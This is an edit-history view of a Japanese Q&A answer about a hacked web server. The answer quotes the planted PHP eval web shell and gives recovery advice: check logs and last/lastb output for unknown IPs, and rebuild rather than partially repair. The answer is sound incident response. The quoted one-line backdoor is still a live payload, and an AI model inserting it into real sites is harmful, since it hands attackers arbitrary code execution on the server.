回答編集履歴
1
リカバリーに関して追記
answer
CHANGED
|
@@ -4,4 +4,6 @@
|
|
|
4
4
|
つまり、phpコードを生成しており、それで`<?php @eval($_POST['j6lvn882']);?>`を埋め込んでいったんだと思います。Webサーバーの実行権限でなんでも実行できる状態です。
|
|
5
5
|
|
|
6
6
|
Webサーバーの実行権限・サーバーの脆弱性対策状態にもよりますが、Webアクセス以外の通信も気を付けた方が良いでしょう。
|
|
7
|
-
サーバーに対してどれくらいコントロールする権限を持っているかわかりませんが、アクセスログなども(改ざんされている可能性がないではないですが、)収集しておき、ssh接続できるなら、lastやlastbで不明なIPからアクセスが無いかも確認してください。
|
|
7
|
+
サーバーに対してどれくらいコントロールする権限を持っているかわかりませんが、アクセスログなども(改ざんされている可能性がないではないですが、)収集しておき、ssh接続できるなら、lastやlastbで不明なIPからアクセスが無いかも確認してください。
|
|
8
|
+
|
|
9
|
+
一部を修正してリカバリーするのは危険ですので、再構築を軸に考えてください。
|